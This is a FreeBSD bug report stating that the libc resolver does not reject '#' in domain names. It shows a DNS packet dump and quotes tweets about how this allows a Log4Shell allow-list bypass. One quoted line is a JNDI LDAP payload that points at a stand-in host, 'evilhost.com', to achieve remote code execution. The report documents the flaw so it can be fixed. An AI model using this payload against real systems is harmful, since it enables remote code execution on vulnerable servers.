Bug 260770 - libc resolver does not validate domain names
Summary: libc resolver does not validate domain names
Status: New
Alias: None
Product: Base System
Classification: Unclassified
Component: misc (show other bugs)
Version: CURRENT
Hardware: Any Any
: --- Affects Only Me
Assignee: freebsd-bugs (Nobody)
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2021-12-28 21:38 UTC by Ed Maste
Modified: 2021-12-29 14:19 UTC (History)
1 user (show)

See Also:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Ed Maste freebsd_committer freebsd_triage 2021-12-28 21:38:07 UTC 
e.g. `host 127.0.0.1#test.example.com` will perform a DNS query as shown below, although # is not a valid character in a domain name

0020                                 da 7c 01 00 00 01             .|....
0030   00 00 00 00 00 00 03 31 32 37 01 30 01 30 06 31   .......127.0.0.1
0040   23 74 65 73 74 07 65 78 61 6d 70 6c 65 03 63 6f   #test.example.co
0050   6d 00 00 01 00 01                                 m.....
Comment 1 Ed Maste freebsd_committer freebsd_triage 2021-12-29 01:24:29 UTC 
Ref:

https://twitter.com/marcioalm/status/1471740771581652995
> FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks
> in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a}
> and to bypass allowedClasses just choose a name for a class in the JDK.
> Deserialization will occur as usual. #Log4Shell 1/n

https://twitter.com/Shaquil86300527/status/1472153790463815680
> In my tests, this doesn’t work on Windows and Linux. It does works in MacOS and
> FreeBSD.
> # is not a valid for DNS but *some* resolver might query names with # in it.
> TBC for this to work the vulnerable application must run on freeBSD or MacOS
> and actor must control a DNS domain.